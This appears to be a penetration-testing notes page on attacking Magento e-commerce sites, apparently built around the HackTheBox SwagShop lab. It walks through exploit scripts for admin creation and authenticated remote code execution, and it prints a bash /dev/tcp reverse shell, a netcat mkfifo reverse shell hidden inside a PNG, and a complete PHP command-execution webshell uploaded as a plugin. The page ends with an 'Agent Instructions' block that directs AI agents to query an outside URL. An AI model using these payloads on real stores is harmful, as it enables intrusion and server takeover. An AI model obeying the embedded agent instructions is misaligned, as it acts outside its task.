# Magento

## Magento CMS

* <https://magento.com>
* Magento is an open-source e-commerce platform written in PHP
* <https://magento.com/blog/magento-news/magento-community-edition-1.9.1-now-available-download>
* <https://docs.magento.com/m1/ce/user_guide/configuration/url-admin-custom.html>

## Scan

* Magescan
* <https://github.com/steverobbins/magescan>
* Find Version, Files, Etc (local.xml might have passwords)
* Find the Admin page: <http://10.x.x.x/index.php/admin>

```
> php magescan.phar scan:all 10.x.x.x
```

## Create Admin

* RCE 37977
* Magento eCommerce- Remote code Execution-37977.py
* Will create admin creds using a sql injection

```
searchsploit magento
Magento eCommerce- Remote code Execution-37977.py
vi 37977.py
target = http://10.x.x.x/
target_url = target + "/index.php/admin/CmsWysiwyg/directive/index/"

python 37977.py
http://swagshop.htb/index.php/admin/ 
Gives us Admin credentials!!
forme:forme
```

## Authenticated RCE 37811

* Must have Admin User/Pass for this to work
* Must have install\_date from '/app/etc/local.xml'
* Lots of tweaks and errors to get this to work
* <https://joshuasuren.medium.com/hack-the-box-swagshop-write-up-18-1c18fecf885a>

```
-------------------
Authenticated RCE: 37811.py
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution

vi 37811.py
username='forme'
password='forme'
install_date='Wed, 08 May 2019...'      ..from local.xml

-------------------
Errors:
ippsec used path to admin page to help:
python exec.py http://10.x.x.x/index.php/admin/ 'whoami' 

-------------------
Other bloggers updated:
userone = br.find_control(name="login[username]", nr=0)
userone.value = username
pwdone = br.find_control(name="login[password]", nr=0)
pwdone.value = password

-------------------
More errors, had to update: from 72 > 2y
request = br.open(url + 'block/tab_orders/period/2y/?isAjax=true', data='isAjax=false&form_key=' + key)
                                                 /\
-------------------
python 37811.py http://$IP "whoami"                     ..error
python 37811.py http://$IP/index.php/admin/ "whoami"    ..better
python 37811.py http://$IP/index.php/admin/ "bash -c 'bash -i >& /dev/tcp/10.x.x.x/9001 0>&1'"

nc -nvlp 5555
whoami
www-data
```

## Upload IDE

* Requires Admin login
* System > Magento Connect > Magento Connection Manager > **Upload**
* Download: [Magpleasure\_Filesystem-1.0.0.tgz](http://connect20.magentocommerce.com/community/Magpleasure_Filesystem/1.0.0/Magpleasure_Filesystem-1.0.0.tgz)

```
---------------
http://$IP/index.php/admin/ 
Login with Admin

System > Magento Connect > Magento Connection Manager

Check Box: Put store on the maintenance mode while installing
Direct Package File Upload > Browse
Magpleasure_Filesystem-1.0.0.tgz
Upload!
nload:
http://connect20.magentocommerce.com/community/Magpleasure_Filesystem/1.0.0/Magpleasure_Filesystem-1.0.0.tgz

---------------
System > Filesystem > IDE
Edit "Cron.php" 
Update it with an evil php webshell

Get your shell
http://10.x.x.x/cron.php

Submit a python reverse shell
nc -nvlp 4444
whoami
www-data
```

## Froghopper Attack (RCE)

* Requires Admin login
* <https://www.foregenix.com/blog/anatomy-of-a-magento-attack-froghopper>
* Upload an evil png with shellcode
* Enable Symlinks
* Edit Newsletter to call the payload

```
http://swagshop.htb/index.php/admin/ 
Login with Admin

-------------------
Create evil png

echo '<?php' >> shell.php.png
echo 'passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 4444 >/tmp/f");' >> shell.php.png
echo '?>' >> shell.php.png

-------------------
System > Configuration > Advanced > Developer > Template Settings
Allow Symlinks: "Yes"

-------------------
Catalog > Manage
New Category > Manage Categories > Categories > Catalog
Thumbnail Image: Browse "shell.php.png"
http://10.x.x.x/media/catalog/category/shell.php.png   ..confirm it worked!

-------------------
Newsletter > Edit Newsletter Template
Add our code block to the "Template Content"
Save Template
Preview Template (to execute)
{{block type=’core/template’ template=’../../../../../../media/catalog/category/shell.php.png’}}

-------------------
Open template to execute the 'symlink' pointed to the evil-png

nc -nvlp 4444
whoami
www-data
```

## Upload Evil Plugin

* Requires Admin login
* MAGento plugins are basically php file zipped.
* Zip an evil [php ](/04-webapps/php-tricks.md)and upload it as a Plugin
* Did not work for swagshopHTB

```
http://$IP/magmi/web/magmi.php
http://$IP/index.php/admin/Cms_Wysiwyg/directive/index/
http://$IP/index.php/admin/Cms_Wysiwyg/directive/key/905d7.../

-------------------
vi evil.php

<?php
if (isset($_POST['command'])){
echo "<form action='evil.php' method='post'>
	  <input type='text' name='command' value=''/>
	  <input type='submit' value='execute'/>
	  </form>";

	if(function_exists('shell_exec')) {
	$command=$_POST['command'];
	$output = shell_exec("$command");
	echo "<pre>$output</pre>";
   }
}
else {
  echo "<form action='evil.php' method='post'>
	  <input type='text' name='command' value=''/>
	  <input type='submit' value='execute'/>
	  </form>";
}
?>

-------------------
> zip evil.zip evil.php

Upload new plugins:
click on "choose file" > evil.zip
 
-------------------
Execute:
http://10.x.x.x/magmi/plugins/evil.php
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pentest.mxhx.org/04-webapps/magento.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.